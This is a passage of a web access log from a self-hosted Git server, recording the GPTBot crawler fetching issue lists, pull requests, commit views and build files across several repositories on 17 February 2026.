GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:18:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:39:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:18:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21824] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +[17/Feb/2026:18:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +[17/Feb/2026:18:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" +[17/Feb/2026:18:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +[17/Feb/2026:18:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21793] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:18:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +[17/Feb/2026:18:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:18:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21825] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +[17/Feb/2026:18:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21825] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +[17/Feb/2026:18:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs" [Client 74.7.227.38] [Length 21692] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs" [Client 74.7.227.38] [Length 21697] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:18:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:18:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:18:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:18:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:18:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:18:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:18:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11268] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:18:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" +[17/Feb/2026:18:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&state=closed&type=all" +[17/Feb/2026:18:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&state=open&type=all" +[17/Feb/2026:18:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&state=open&type=all" +[17/Feb/2026:18:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&state=closed&type=all" +[17/Feb/2026:18:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" +[17/Feb/2026:18:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:18:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply" [Client 74.7.227.38] [Length 55211] [Gzip 12.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2fquery" [Client 74.7.227.38] [Length 24942] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:18:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13753] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 